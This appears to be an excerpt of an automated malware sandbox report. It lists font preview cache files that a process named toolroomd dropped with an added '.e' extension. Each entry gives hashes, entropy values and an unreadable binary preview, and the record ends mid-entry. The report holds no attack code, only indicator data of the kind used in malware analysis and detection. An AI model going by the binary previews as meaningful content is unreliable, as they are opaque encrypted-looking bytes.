Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.......F..P...`>.eU...r.f]..ir.&;..84.....y....r.g.#.....%...O.....-..(..C..J........^4S.L.....ps.ev.}.6..S...l..gP.!B..v.-.~..FeB....r.....X7...IfO{.].........../{8}...2....J.F...K..g.T/>...h..3".s....a.....Y...n...!..@]m... ......I[...v2.i...EP.=V.yb.MYH.........K.I_.....J.......%.......r..../4.j%9(..N.e...@.Y.c..#.-. ......q.._..{..B....t..?b..Rh....h9....T.rk.BQ?......RL...@.R.w.....p\o.^..DQ.t.......C.H......5<n.b[.$\|......!..qc.`.....V....c)1z9.p.....d.Y.j.....9.T"..........b5...1ay..#_....S.\.}..f..(?..]X.S.1...f$.."K.}..... U.".L+r8........&............H.[G.2O...mH'..(.ap+...t.k2.wR7S..d..K..a.....+.v...Yn...NP.gV...l..!.!.)..i.6.1..5..t...3...(..Fq;.r..P....ds...`2vq_M.~...t}.%.K......:...LP.bf...8I...eT.......b.3wcD......I/.H.#.f.QF<...X@.`9.0.zI_(].x[...m.`..s.D......HJ.[A......[..t.X....h...@.........I...:af.......&..+8.#...U.....yt-.....$.V.....:5.9..`.F .A.....ky..X..;..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BatangRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1162
Entropy (8bit):	7.300480508582084
Encrypted:	false
SSDEEP:	24:EGsOi/rDKUfZ0xwTXXJXCqTYmhIfaa1jDAEM1sePc0m7:Ewmn72xwZXCyhGhWNpq
MD5:	5B0AB13B5B84B103300875E67283F8F1
SHA1:	1F67F5E7ABC15E758E07CD77D94C491C42FA0C8F
SHA-256:	69DBD4BB1A2AB31AC615F97DCDA8FC5256E3A84FEC174D1F959C2A48676DDF62
SHA-512:	704047BE41EE42514566BE268911DB45EA2189A49CE0D33AD9DE70D892387E3636BB27CDA56329DADDED800DA60230805AED36E14153A7A60B1AE1F55E60B078
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...Q.X.BQ.rT].?_..n..h?.#.O.J..w.....%R....&...QP....6g..}S:R.}..T....gq?.O.G.k;.xzU...@[.w.....u...7-l.nT.izBPWy......+W.I..$._.U.....I...8L..n....=.......j..a....fv....._..i.%.OtX..m...'h..F....._......'.N...ti.....<.eml=.A6G....9D..UI7l./..G).n.`5W.10j...m........u..V.q\|B.u.+d....a...\|{J%I%.`.e.G..&\I.X...%..A....R.c)....f.H.Z.).@..^-.1...]...}.K.....\v....ef9.wJ..)..7I..(....Kv..'.h..e.d...9.ayL........HH]......?...0.m.i+M...W.\j.'..i..Eg....Y.3....d...1.'.E......T..c.2..Z..Gp.....B.0.}a../Vr-..3...V.z5....44_N/@^.T.....kC....k.Q.L...m0.Q..@.....m.d...a.a.S@..\1^..h..3.\|.L.].....O......=c...S...nq....O.3/!8.m.^`..:u...e......Xp.T.K#..........#(..KcZ.~..BVoo.Tx..........p...N.k....G..%.$"~.).....[....:.......Wj...7-l.nT.A../V...`....r.......].....-..Y.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bauhaus 93Regular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.437639222744756
Encrypted:	false
SSDEEP:	24:EY+Qb8QIhvqNWwFSmCb1BtvONKe0GWDUVv3gzIPMcpuedJGsePc0m7:EY9bhIhvUhCbBOce0GWD0vPMcpDdkNpq
MD5:	A511EBC1159A71794FC9BE2B9BE8A1E9
SHA1:	183552522EB0A1617B333757ED9C3DA460F31F56
SHA-256:	DBF1E40BACF3A0E9AAFC5A66C8916D8BA69F9733F9D58B3208A3E1FA0BBBFF22
SHA-512:	9ECB7118E804D9B81EBCFB82A78D080867951E6DAE4FEC42C9F49517E82562226B419BECC80DCA87FF20B3AC381054F41BBB1ECAE31AD14F29455755B3E8F860
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a/....&.[.......t........Q7."'..5....oD>}.C....8..l%Q@.GA..o...v..G54....L..N...].L2..1.<3.F7..9.PsK......d.X6.IU .O.._.._....1...1.V.e:......d2....j. cc....,P1Q..Hq./8=)Ik..s.b....u...#.t.i%2#..7.....(..a..K...p......Y...m..Q.2c.&]...,.".b....\.+H`.rk..W^.).%...u..NY....1G...{...Hum.p-@<..#...J..z.......p9.W.p*.86.2#..JT[...`.?_..il8...p?.r!...2k@9.m..g]x......AE.=6.h-O....[.R.k.z..Uj..w=..p.[U../.AAv4..^l.F....e.#..<+..<.S.(I.O.e..9...l..T./4.+..mO.#..P.,......iz.a.^.t^..aG..%RU.a..o....1j.j..dted...wh...Rf.C.U..&.Ce....a..B....0{....!6w.p...?.......az...,..?..%.Sv.[@J..o.o.X.s..c%L ..Y#.Ga:..X.....I.'?fb3..3.p...t...].k.nx.65>...b.......;.q@.~1j.X.9.n.....u..'..3.]..D......pg.).b.[..<c..oT..=.W..\|.[8w.._C... ;.0p.......]c....N\|......;w.\:k.K~.T....k..FcD...W-..QR..'bo..\|..mA6...+......=....h2.....~..S...CE.P.y8t\|.`....m......I...i.Z...6b..WC.e...QY P.K..Lw.T....i....6H..Y...A..Y.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BeirutRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.249593144752441
Encrypted:	false
SSDEEP:	24:EaxgEcap6D/7TI55Pgz+rFUkmUryw4vwNisePc0m7:EIcaEjIXPgz+ZUkmUrIvwNiNpq
MD5:	D5E09BABDF28B69A595AFCEB0137A3CB
SHA1:	146A1D4394D7B863A5A161A27D702115F5EB0D22
SHA-256:	15CA5847D1E59ABAE3AD88E01AB76C875F98BF03A64BB971C63F3BB98249A072
SHA-512:	DB7A0DE469203EC7CFDA066FCA60EDCDDA79DE7335E2AEDDE89937B90EB2696D33A530E82B66FC518E01E8059223F8F2BBA9A53921A9E246302601D5F336DF47
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.zX?.R@.....z..j.d.m.r3H.]..._&...D.."...X..J.PDZD..\PD.M..E...@r$s..B..Jq..S.....p...Y....d...p.?4d...3.w.H%0A.G....Z.....FBl.\|.?}...#E..k.]...A.)...Y/....4.V....Z...yy+.'..5.../..im,.Hi..V9.QG%X..D..ma...W..\|..+.A.D.}g..{<....q....M..u..~'..\|qUu=.\|..}x...l.o....0..].=..{....B.....I...[m..T.i:R.Tl.Z....-eBZ...a...i.....V....'..I%Aj...]l.G[.N...w.p.0..................ML...a.....^.....PE.........(-...nX.w%q3....J].4.'...n....2.=....b..=z..h.'....Z:.`}P.e/.y.z.^....2..k.!...U.iL.&.y..sn.RJ..xi7R..t[..s2.".`I..i.CQ.)l...m...{.....?...9c.A.N.5.>]7'.C..x......"'..... ...p.5#R.ICpm.qlj...n.'?2J.P...1....4."r<..F=.@/.....R.^.Bg?;EQ...L..M7/..b.).-<.h.]..{....I..izBPWy..J...I..tY.w.._o.Q.zN+.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bell MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.428180745683107
Encrypted:	false
SSDEEP:	24:E2mDyGUOjBL0BBFl+YyNMT84NVIpWAqZaw5Jlfb2YDg2ON/dtgsePc0m7:Ed+GRKBKY2MTfxZvzdHDpON/PgNpq
MD5:	7658820913FA09ABBF611733C9BCF6AF
SHA1:	1B77E47C1B4F4B358D16090CF27915873B727B48
SHA-256:	3667F589EC32DFB85130D92E81B694BFD4F1BC84CF3E31B5FC311B2074AED01E
SHA-512:	B72AD18399829C9BABAA3A617F9C703DE3298504952303466B5B52FA6E9B4A7DD18DAB1633C0324D5233D9F1168600F22F449704759D0C241264A6CE4021269E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a........"..Y.b..k.M..~.Z4.....b...B.f.O(..2u.L...).p.:..`2...O.v.....p.u..b...V4%....y.!.u.n......2...Y@.\|...,i...........'.X.7....#...R'R..:W.T.O..n\|.f\.f..[......L..z.w..1..>..'.&.".!v-..5.....g.I.5+/q~.O.b..t.(u....8....$mU3.....B-...=f,.....\|..JU........7.+.AH.O........qX..u*#..9hB.l.#.7....6..;......n.V..........H........v.t....-~. .@x."......,..{b...:.n.p...WQT...E.q.S.3..r.4.ve.A..W.w.4P.LlQ.BE....<...Bl.=..?\|...^x.U.....(.LpI4..K...._1..B...2..>JYc..2.R.B....H..Vq...TXA.........."ii..V..~..,.O...),?...-.........n7...`$.E......iu....D.-(.......$@l...O..E.D. ..j.B.....k.e......:aD..P.-....1t.)...-...V..!.;..3.Z.p.t...R...ug..{D....W.....1....WeDH.C.wX...........l..~.oN.i&.P.,:..]... .R".............z.......K..;=..R.P....'.K...A..\|..,I..L................,...._..Ya..$\H/.r..i..l...r&o[.+[..4..0..T..z...b..$]O.F~'....d...5.D.....@.......<........$...6....M3Y'...{....J..]C....?.W.G...V.V..[......

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bernard MTCondensed.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	7.351230293287905
Encrypted:	false
SSDEEP:	24:E2wAoJkDcuOO8fgB6VxOLe2MkpmBX6kp0Qj/nntjTX4OsePc0m7:E2wLsOOQKQxO/M5Bdnlb4ONpq
MD5:	A9E1B4A46F82DA933D7BC7038DDD4F28
SHA1:	807CD9FA822E39BF6A593AE7AC3B9F9A27890CB7
SHA-256:	1AE9DADF3FA4D111CE1C789EE39D21AD5B8F002C633BBC691BF0CE875A9420BD
SHA-512:	CC7A3BA1B02702AAE82AB84C381459C9602B4756B4437D3C326D2709682DE02CE8EC31B556B36002064AD661DA86EDA0B8075202D86704C6694C6B5A1878686A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aU2.k.\|.&....... ...i.V...Y.O.....r..qY..W.0..i..vb7{C.[Bd].9..........Rr.......\.{....^.M.@x.PLh.U ..i.[...x..,.&.K..A...m-n~.Np.........h.._...7.^....,;.#..$.$y..,...i...Z...[....5.V....9\.....$-q.J...1.v.y..;.."K`....C...4:P......v..2..z...l1.`..u..R..x...{../..........j%Qw+..=F#..d...^..g.g.qI....H.Y..%6.EA....~...O..X<..7y.R..I.7.~rtJ.G.6......u'EmG..%..u.5.[.....-....[.8eP...!...x..;..3.7.]...w.Wd<.......q..h...E.........l.6......q.ePw-...G...&.....b1.h9.'.q..r'..2.FQSX+_.....a.'...4.#~A..\|$"q4d.}O.,.q...)..........J.R...L.a.k...$[.....\|....Dhp1......R."...B..b....{fP.S.w.w.5...........w.XZr......)!._.#=C...\|x..=&.J.D-m[..l.V..+....9.....ik[.}.Z..._y..,....b+a..R.........]..02..Z.......=..#....P.qK...5......K.....iU.......l..(...V3~...{Kk..m&._.#.....9..Ug7..V...........2.1B.X.E.1.#.=j&..O...v....u~Er-.)...Hz..}.vu.."..y.Z.<<.Z]..........O....................\.........^./

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Big CaslonMedium.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1482
Entropy (8bit):	7.504801790682123
Encrypted:	false
SSDEEP:	24:EmWdk6N4M9Sd1g9QfH7cgSJk3TDOLe9/3TViqGYw2oe3LXmj4OsePc0m7:EmWdkGfe6qboMTDs5qGYw2o9jzNpq
MD5:	82D9DE474E7DDF1DEE7F439FDDC84D86
SHA1:	A430CD00A749B5DF0A3D2D8E1E2790C36B2E0036
SHA-256:	8C0B87A6DDED21734645587B3DC29D19A2BC096AEAE8D4A971BE0BE4C7D8A190
SHA-512:	6C88DC11111B60B3D372DB9310C5F6806377FF59499C95D8AFFA8D4789DBE7657943DE406A6D34DCCD0AE5114DB25F8D934DCAF921FADB5C0BFABB9D829F0BC3
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a@....o.........RUd..b.N..:./b.<f$......5.V.....y.......'A.-R.p..i}.....^.^B..E.....S.).E.m.9.f$u9B..=..d...)......6.......'.X.7....5w...........2...Y....f6./K......%=.5;@ .7.i.G...'.N.\)z....."...T.O..3].`.....c...\|.T..x.E. b.C.. Q9.N5..go%<(.....Y.{...L...\.Z..;.`..JaT9.UY..;k.....6.....,...2.n:...a.. z!3...3..N!...i..=.dJ...a.!..FOb..".@....}..>Uh. xVm..`..u.i.p9.c.\|H.>...!....]P&.7...]W.`Q.jy.w..<o.7.(x:.5..P\L!..7.(.w...0....s$#....r.+P.q...nPk.j..^....D.q.D..q,...M....V..SN{.^w.r..GJ1p;...k....zT2;.\f8...yX.k,E.f.l"...n...y........^Tr..;O..c.....K>....f.TN..."\U.....2...\=.Nq..~..d../.M...B.. ......-).. ...F]..........ZM=..Y.J3.W...Ohs.z;b[...0t.S..../o6s..\|[".o.C.d}.e.giO...[.;..L..r!...IH...6.N[X.Aw..#.:.eh........4...LX.l.P..\..}.0...qU.-Y......U....... ..f$...&. .$..X4..`k[.27.....x#'.6.!.<".....=..E.).M..m..@.v.Q.B..#A..T-.]...,.[u.=0...8..-/.h...7.......~..S.u..zNS...9.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni 72 OldstyleBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2002
Entropy (8bit):	7.663362205660585
Encrypted:	false
SSDEEP:	24:EXAi1kWpc8pND6CmvDOJPYlIGySDD4Le9TccCMjMHbOcRx+qZoeAwtOyVmY3e1xX:EXAijtpEdDoQIiv94AceghoyY/zfiNpq
MD5:	953B785AE653A1C1736C8B7AE29A938D
SHA1:	68881D50D5B22260725B22C3A8EF39D3DF16104A
SHA-256:	861F223936C5078D13F654A606552BA63E4F4259F5753E9CCFE8AE41F1491D44
SHA-512:	A14A75B85093FD91590B8954A67D207023C0B058AA43CB19E7C8C036696A781B902C0233671C9EBA66F24EF9333947CBEBC7325C28BC4D63D43859FD6FAB83A0
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.ay..h._+<9E..U .b.E.C..-&'...?.....C6..A..{..;a1...D.2.?.t..#...`w....>...=...i.Ff.Y..K.M..pc.:Z..5&...?GH.>..Cp._....Cp._......g....%L;qVL2...?.z..V.].w+qd..G.N[.D..5..F.9...g .F..E.....0.)K8....7.w)EO.v.. .%.s.....V.V`..4.q.zF..C<r.kB,..2.n..c.f...._..6./...8.q.......hV.`H.lP.xw....1...%.qB..L.m.z...he.l.....6.I. .K...i..u"..}2.....H.QL...........`..ua....\|..........J.\|.<......q..Y7}.O3N@..M...a:9.j.b...P2.J.vZ...%x...I.&^4n.Hog...8.5h...?.:...w.zT&..O..bkN.}FO&...~{6.{EE....~>."}.../>.:~.T........#.r...oa..f.n. .e...C...E.0.J.A.0..7#u.Z.7..\|Cu.m4.of..c.,.]m8...=z.-...$~.v.cm.m.z.!.O;WL.....U.xA5..x.zYHf%....@..{`...$K....Y]..y.^/%mR.\..q..$Y..(...`.....L.f6!(mb..'....^1T..........y5.]...qk...&.U..U>.......@x..~.!.tP...l...p....m.6.(.....E.H.r....?. wdX....=.[....O`...o...$.>......Q..\.)..'....A...u.....r...U..F}:M.g/RQx.wD0..7.@.w...q...RVp......h...6....9,^P.....jG.....(..(....~..fy.....\ ...P.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni 72 SmallcapsBook.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1858
Entropy (8bit):	7.622515479341129
Encrypted:	false
SSDEEP:	24:EDKVgdR6++KzYPKSrENwWuN+7UZJxRkmJJedaLFLu4YSBJoySfFZJRvGfJ8vUyDy:EWVADhnSrIxuYgxn/1u4Y1yWvvvNbNpq
MD5:	D292601D6486761E2B26578EC4421D63
SHA1:	9CDE1C6441318DD19C8F55DE9B431B2E5A93B9A4
SHA-256:	EC204FD0A2F61E767EB7D5FA2339CEF4D0FE0421F4CAD1B10D92CB66E6D665AC
SHA-512:	1C586275BB953B10F7FFF9152D90E729E5BBB8980C69C74D52A4A722762303FE1CE1210A9F9082C489DA391FCE0DBED36B900584EEF8DA807102F8CCF53C7ACD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..De..s......;.$eT..Bz9.]..........%?5.....W..eC.G.7.&.W........V,.i../.].....0l..z..W.;C...l....lZu.hLfC..B.hLfC..B..%......P9J..2..o...T...R.7...0..D@..X...l.i.o....Z-....{k.+.F..{U.\v.......7.I\|..SJ.3!.r7\|..M..>.aO=<.=.V..m.....j..:..t..B?..t.b.M..J...>X(.@...3...x-.B.^gmP............sa..$.....<1..p.....0B.H.zC.Fj.B..06-...@.U.~\.>.C.&;..?....?..u.-.(F.cXjO0.[.)tk.\....L..XS.~e'..4..._....8K."c.........K.r.<...r.n....M{... `..OU..S9.iY..o(.,{.)..{.DD.!.<.Dt......f.X..s...-5....<V.m..FP..d..5wx....6...t.i..!..~.......?G........C...:.......\...D.)..mLT-.....T..\\,....H....GM..LI1...4......:.J.K.\|....Qk....a...ja..DR.AV.9U._.e..y...~._V.I.................Q.2..?..........s...F.p.lt...(6....!...Q.B..........;..0...mo.c#.^..-...r.b. ..O.5.J!B..j..=H....{.....M].../.'.6}....s....W._.I.S.a..........#.........3z.p....Z..I.%.....,t(....Ot...N...6..O...F..''....E...r..x..k.}.......

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni 72Book.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1394
Entropy (8bit):	7.45249672206795
Encrypted:	false
SSDEEP:	24:Emu9DKWPvYAR4Rbwrvc6UtNjRYtheLGop4EaW4EQKz0qHnYsePc0m7:Emu9+ijyRbwrvc6NhuGopkTKwqHnYNpq
MD5:	BDBD7383317B5064EEDED0AE092E381F
SHA1:	69DA1EB2EE790850A0D302AD715DC750666F7F44
SHA-256:	2CBF636CEA7E6B050F8465B9C097274CD4E8D33D99941D872DD4C248FCE2C867
SHA-512:	E93C09C05A69253BF18CDD9EE14009FF99C2EDCEF0D94B0BA856C21A0062EFE7E6221F473222112F79405D8D137A15CB19A092ACF0612C448CD35D22ED98FF18
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...m..HL..P...l....W.,<..v,.!...bF0.."....h._s..;..a.b. .8.Ir...N:.M.a..J..^.+,....ze.....'3a.u.s(....G..a...D........L.<.!.81..2...R..i..t&.c.n.g...?.......we...x^........yo...B....E.M.[IK4.Q.Q#...p.&....ex..9........>E....[....u4.8........^i.J.....\|Y......O.?.O%........O3T{....T...Uz..)x..r%..85..B@;...x3....+.M..r~.r..,t.p.oo..q.=.>...T....w...W`eNC...p.._...Y+.M.&....,{.~o..x?...W..)..w...../.e..3.~..:S.T..x..r.....A4..a.....p...2z.:[ym.7.<:.?.y...B..Np;/.q.E...X..u.5.....<0'.<.........p...2.]T\u...........`.}..d},....f.......l.u5w.v..X.&x.,.m.@.HA4.dBp.1v.^....v.....".b.+W..(.....hs.......5.R:z....q..TE^&.er........C...b9.......&.z.TY./.4......JS...i+(/..^^.......dBB[...a^.)D......6C....g..%k..=..P..+...T.s..g....A+...t../1.C.HD....43Utm....l.......E.a..^3.9<....^q...<6.c...d........ u{.].Zu9...[x..X....b.a...,..L..4.CS ...%..s..C..............\|.U...".#..!...0.R...n.......m..&.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni OrnamentsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1834
Entropy (8bit):	7.620985336990261
Encrypted:	false
SSDEEP:	48:EHTia19CMMrfekg6Zusg7dn7a4MSOFZHzKfzLSlLd2jSWNpq:+1oMR6ZupOVrz8W32jHu
MD5:	ABAD4CD2F0D942B24EBC329055378EC7
SHA1:	B6CB8DBF1355AA148DFD034008C8869AA5082B46
SHA-256:	E8CD657A574193F12DC49029A6F2EC9E29A4E36A4D65D42204F977AD49D7A53D
SHA-512:	81B2E019B7459387DE8BB2C889BA26E6650ADDA719ED6DEC1730D32E35B07559B1E81991880A966A3D7494C06436D5F971C2CEBC0A1147AB6B3914BB5AB6500B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.al,..I\|Q.8.U.nc...a.].O..JE.g.u..C"..F..q.,[......[...oM,.....\|T.e..].."....u..v....0e..5....P.>...4\=..a....b..w....o.?....o.?.4.....>.....y..d. .Dz.......:N....S8{.q.^..61M.n.{'m?.!.M........_/c..i.\|..[..t...8....6..OP.....r...`.......$u.:..Yu.y"=..r.!._;-.....r."..w..o...:5...[.2.{....0.D...\....>......6.M..3b....?swH..h.u..Y.G4...~.@....z.'`.l..U...y.i\.A..7.....@C....l.2..,.h....T.Y7li[..K..O.K..>V......Ym...BP.\|.0..../.<...}.]%...5.&.v..D..:.Mf.._..T.}Y..bs....2.f...Kwq..n...8.^..9._..77.....<.o.`..To.C{.....v..Rn^4..{9E...6I...'.....p.H...(MX...l..U....P..^.F.r...t6fV.Iv.Ks....{..d......v...c.6G...V....y..S.s}.........=j2.4..<G.!.B.4...XK>x1........Fc...wU..x..b....d..M..L...1...P..)....`.\........Wc.......:._.1)dV.8...O.}..PA<.. ?....m...8..t6o.K..: ....$AG.-..J&q...y%..#.l...$%...v..,...&...>....'......7..T..va...r.?)VP5.IK`.q0...&...../.,....uh..IE....*...U.'.a.-..6.....

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Book AntiquaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1770
Entropy (8bit):	7.606255362301675
Encrypted:	false
SSDEEP:	24:Eq15UHjLtBgPNKVIjXoYNf5K0amSf0RyrA3TkA8LApE3H04CaxiT5l6JfiQNPB+u:EnqSIjYYx5OfhA3TyApVKOlifb+Npq
MD5:	D7CE4ED5CFDE01786C3E3E4767AC338C
SHA1:	B54EF8127414242F476E47A679C3CC8F62411D8A
SHA-256:	0A2EE3F7B3930357B956E9C66EF42C3F5BC24422EC928BB20DD5AAB3EA213720
SHA-512:	F5D87519A5E6716F53241798ED19F253F10DAB26D454C38D07ABB4BE70299D48F5ED7BFB0248A52281389275CFB555CB84F9EE8CD0F0088EAB23E476EBEB05A1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.).m.2...m...e2auxzr.-..,.]..~.._G..>.)..u.h,....+.G. cs:...`../....J....Z.K["mX..b..p.N..ms..o....K...BU..Ek......Ek......Ek.......r.`......D;.:.[..8.c...Nb....ZD...j.........U......T...e6.y.:.;J..B.5a<l...7.P.@..4..W.;.~V.....QL..>..'.r.B..Gl.a..[.!..`...."..p.AQ....\Ry.>..!.M2+.....8L...).e..Gj<.'.#..oK.....b...5../.;.gJ,.9..Q....^.L.J..i.!...~7`./.P@..\...Sq......rX.W......(..&.N..}....i.t.4>! .k@q..G.+.......bC....1.N.y.'.......z.........<...j<..OMN0@.S..`..q.......:jiC.......g.A"...2..k.Y'.Q..4...~C.].......,.t3o.`:.... ED..=6..Sk.......>XF;.3..-.4f.O.....-Z.4.IgR.6..i...?..FdU@@....j{...Q.#.bd@.ge.aX.av4.H7..gm....[H.t..i..#.uP.....22..f...RiQ.....C.sU$.A.......q.....1.@i.l......N..t.E.h~.=./rq.`.Lr.}.3LT.T..=..{.jP.B.Jw..{..eeJSYG0..O..d...........D..PV!y#......+..vlJbR.y.M....8....C..[........,.Ojqn.#.7.4Ur2.z.......X..B.. `.F..T.rH.g..(.&..5Y.W.bF..Y.p..VR(..M$......$?b.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bookman Old StyleRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2130
Entropy (8bit):	7.679799309673374
Encrypted:	false
SSDEEP:	48:E2va3QVFkx/OuM6x/s3rrflxM9UJrQEowc03DZNpq:pvaukx/OurxU9x8rEXHDZu
MD5:	DBB16DAE43DDDE05BFB33CA3D00E3EA7
SHA1:	B4333D7507FE75912A36063FF190EC23ABD95A6F
SHA-256:	9B5184A2FF208955255C345DC1D7CDB972741F1E05043E4DB8F16AD36A1DF2F8
SHA-512:	1F6EA6D94234C1AD10D6BAFD369CABC69652BA32C17895DA82A55882A32A8FFC34CF4345CCEBA677F324841A67297D6F64A2D58DB52D2759A97D367A8203A751
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..16iEX..W..r7.mL.Zr5......!.TC.o......:..........]~.Z.....U}.h...<.' ..cf.nqD..o.vq?....S..2.:9..6..=....6..=....6..=..G..........Y.......X,a.~h.k.!.......Q.7P.q../F..kQ..!_5N=...]K./..Xw.....,(....l.!:....l...o.8.zk...o8..........D.w0.q.........E..(.Y)...l.I.....J{.kV.vUJ....{.6U.L...MSLk....ZH.....:.~.7.,..2.....r.Z{k..5qB<.....:.:.....(..........x.if.+.....5.....Z.....g.....;%.I..1MM.........{Xl$?...-.~...j.4j!i........@...#.....<....q..(...M.$......R?..0T.z.~[.\|..~@=.M.rdYB...[&.)V.k.....7Y.....}.........I.... .....`.$a.c..o...........).5...R....(.1.5.S...v.!.F...!v9....hB./........9..y.g.....c.B&.T.^,n..zG;../.'..4D&...a.1&._..../...bhc.oY7..D.................S.M....?..\Wt.LS...dwT..7+?..5..bf.../.i.....~..N....6.Z8x^....[.4w(...+/..zwh..e".&.e'<./..w...ov3.dz.c./..j~...<.6D..Ne7D..y.?N.Er.'..$.."oZ.....8..+..N:.^...z[E[>F'c...#YjlD=........Sg_..<...s.D.n....T.. ..l..o1-..p./.Z.8..R.~

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bookshelf Symbol 7Regular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2090
Entropy (8bit):	7.671589246743002
Encrypted:	false
SSDEEP:	48:EbBU9FgKFaSKjjVUyPukT/sHFOxplP0cuw5jOPNpq:4K/DGjjVUc/slqccvjOPu
MD5:	776C8AB6FA28C06B996DFB2812997B18
SHA1:	8A2B77D8EB37572CE01728952C62A998D98F1C67
SHA-256:	8F6AAE455C797C31E47565B62797A8BA3BAC944D0DE2322DD895CDC48A15442C
SHA-512:	A8296A121562397A350E651C4B914B54E44ADC7D98323DF2634F404D13A8CBD00B22CA15B2478368960CC62CFF98A0268A1404E383A0F1AB1FA8319003C0696F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a7.Metk...+tWJ...U..t.C5..R..2.Q.C...FO......U.C....=..v.tK-.)'kn.:.<..7\|.(.....lb.$f.[Dv..%.].........w...>....'.>....'5}.:..+.a...j7SW.+...+.........8..~(...}b.....K......x:q.[....eEB.......+x5.4....f...<e..1.....K<d.:..6..`..S0.y..Cg...Sev.]\./;...P....~.D..X....]..9.C8.\|zs..J.\..M....RZ.C.,..9..8......k..Y3q.{......9..m.......d.%.!Yry.....).5.}`.ly..yMxg5.Y.....I.6R..K..FH.=j.@.v....3.>....[s6S.......:...}..I^.o.^...uZ.$...\|.......OM.%.)...........Or....].....<Y..0{....e.a.......=..@>[..A..E#..7.y.ub`.!..K}=..1._)..CQ.....TVZi=.#..9...........L...Vc/....d{2T....1C#.r{-.=.i...,un..e.9.8/...d.`..... .4e.6.s.@S6..R.t/...O).^b.S..2..~c...(....z-.X......e{.E.3..9..!?f....Zc.Ib........j..M..c.@%C.m@..G.7p#....L./9.X. .m.1.....F......Z....B.BF..V`...g.S.Eb..3..k..s......K..R..B_...s>...$XkG&.7....$X....:.V.w.....B.9w.....~....,...U.. .#e.I..B. ..V=..u4..uZk.....}...y..IHg.....\|.W..VzCe.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bradley HandBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2122
Entropy (8bit):	7.6935381374443885
Encrypted:	false
